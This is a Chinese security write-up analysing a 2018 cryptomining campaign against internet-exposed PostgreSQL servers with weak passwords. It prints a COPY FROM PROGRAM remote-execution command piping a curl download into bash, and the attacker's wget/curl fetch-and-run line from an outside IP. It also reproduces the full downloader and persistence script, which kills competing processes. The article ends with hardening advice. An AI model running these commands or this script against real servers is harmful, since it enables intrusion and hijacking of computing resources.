PostgreSQL数据库批量挖矿实例分析【国内首例】

  • A+
所属分类:网络安全文章

PostgreSQL数据库批量挖矿实例分析【国内首例】

摘要

随着数字货币行业的火热,挖矿已成为攻击者变现的首选方式。而数据库服务器作为算力的重要承载者,也早已成为此类攻击的首选目标。

CESAFE安全团队跟踪发现,继Redis\OrientDB等数据库类软件之后,PostgreSQL已逐渐进入此类攻击的目标范畴。预计未来针对其他数据应用服务的此类攻击也会逐步兴起。建议数据库服务提供商和用户在默认安全策略、密码策略等方面需要提高水位,防范潜在的风险。

2018年8月10日晚19点左右,CESAFE安全团队首次发现一起利用PostgreSQL PROGRAM特性进行批量挖矿牟利的攻击事件。该攻击者首先利用扫描收集弱密码机器,然后批量登录后使用未公开的 可致RCE的攻击手法部署挖矿软件。

本篇我们对整个PostgreSQL数据库批量挖矿实例作了详细的分析:

PostgreSQL数据库说明

PostgreSQL 是一个自由的对象-关系数据库服务器(数据库管理系统),它在灵活的 BSD-风格许可证下发行。它提供了相对其他开放源代码数据库系统(比如 MySQL 和 Firebird),和专有系统(比如 Oracle、Sybase、IBM 的 DB2 和 Microsoft SQL Server)之外的另一种选择。

漏洞影响

整个互联网共有336,784对外开放端口的PostgreSQL主机,它已经是互联网数据库服务器的一部分,承载了大量的重要应用和数据。

随着数字货币经济的不断发展,大量的数据库服务和应用(如Redis\OrientDB等)都已经成为了挖矿、木马等僵尸网络的目标对象,而PostgreSQL也在这个攻击列表中。

使用弱密码,或者将服务暴露在公网的9.5以上版本的PostgreSQL 服务器都可能受到此类攻击威胁。一旦被攻击者入侵,机器的计算能力、承载的数据、运行的应用等都将会被入侵者所控制。

攻击事件说明

攻击者通过端口扫描批量发现开放了5432端口(PostgreSQL的默认端口)的机器。

通过标准弱密码进行爆破尝试,如Postgres/Postgres默认密码即可登录一部分机器

通过 PROGRAM 方法按照登录的账户权限执行任意指令。

(注:本漏洞为本地验证,出现ip地址均为本地ip地址)

  1. COPY rce_test
  2. FROM PROGRAM 'curl http://test.cesafe.com/1.sh | bash';

在本地实验中所使用的测试只是执行一个简单的 id指令进行测试。最终结果如下:

PostgreSQL数据库批量挖矿实例分析【国内首例】

指令成功执行。结合越权漏洞一起使用,本攻击方法能够达到执行任意指令的效果。

具体到本次事件中的攻击者,只是使用当前用户权限直接部署挖矿脚本

  1. sh -c (wget -q -O- http://204.48.25.175/kworker.sh || curl -fsSL http://204.48.25.175/kworker.sh) | sh

下载运行脚本:

  1. #!/bin/sh
  2. XURL="http://204.48.25.175/kw0rker"
  3. XNAME="x"`ls /dev/disk/by-uuid/ | head -n 1 | cut -c 1-8`
  4. XPATH="/tmp/"
  5. XBIN=$XPATH$XNAME
  6. download_file(){
  7.     if ! `(wget --no-check-certificate -O $2 $1 || curl $1 -o $2)`; then
  8.         if [ "`python -c "import sys; print(sys.version_info[0])"`" = "3" ]; then
  9.             python -c "from urllib.request import urlopen; u = urlopen('"$1"'); localFile = open('"$2"', 'wb'); localFile.write(u.read()); localFile.close()"
  10.         else
  11.             python -c "from urllib import urlopen; u = urlopen('"$1"'); localFile = open('"$2"', 'wb'); localFile.write(u.read()); localFile.close()"
  12.         fi
  13.     fi
  14. }
  15. run_file(){
  16.     chmod +x $1$2
  17.     command cd $1 && ./$2
  18.     rm -rf $1$2
  19. }
  20. keep_running(){
  21.     xpid=`ps -aeo pid,command |grep $XNAME|grep -v grep | awk '{print $1}'`
  22.     `ps -aeo pid,user,command | grep -v grep | grep -v $$ | grep -v $xpid | grep -E "postgres|python|stratum|nohup|/tmp/|sleep" | awk '{print index($3,"post")?"":$1;}' | xargs kill -9`
  23.     `ps -aeo pid,%cpu | grep -v $$ | grep -v $xpid | grep -v grep | awk '{if($2>45){print $1}}' | xargs kill -9`
  24.     p=`ps -aeo command | grep -v defunct | grep $XNAME | grep -v grep | wc -l`
  25.                    if [ ${p} -eq 0 ];then
  26.             sleep 3600
  27.             download_file $XURL $XBIN
  28.             run_file $XPATH $XNAME &
  29.                    fi
  30. }
  31. while true
  32. do
  33.     keep_running
  34.     sleep 5
  35. done

该脚本的实际作用是下载真实的挖矿程序。

PostgreSQL数据库批量挖矿实例分析【国内首例】

攻击者使用门罗币地址:

  1. 41ixve3yz58LhFbEpVqnbXeeMe7xq6R5uU9jz54iHBqFTddAKfvpSGDUg6xDyoTHSg2uxZQG6FjiE3Em435cypdjLkFNCc8

共计获利19.718362120000个门罗比,现价(619元/币)折合人民币12000元左右。

查询该地址归属的算力地址自8月10日中午开始暴涨近4倍。由于该攻击者的攻击手法使用了PostgreSQL9.5之后的一个特性,而这一特性是首次在此类攻击中出现;同时,该攻击者的攻击流量仍然较小,我们相信此时此类攻击手法仍在早期阶段,后期会出现扩散和变异。

安全建议

建议加强PostgreSQL的密码策略,不要使用默认的密码或者安全性较弱的密码

通过安全组能力设置IP访问白名单,不让非相关的IP地址访问PostgreSQL数据库

CE安全网
网络安全宣传推广

发表评论

您必须登录才能发表评论!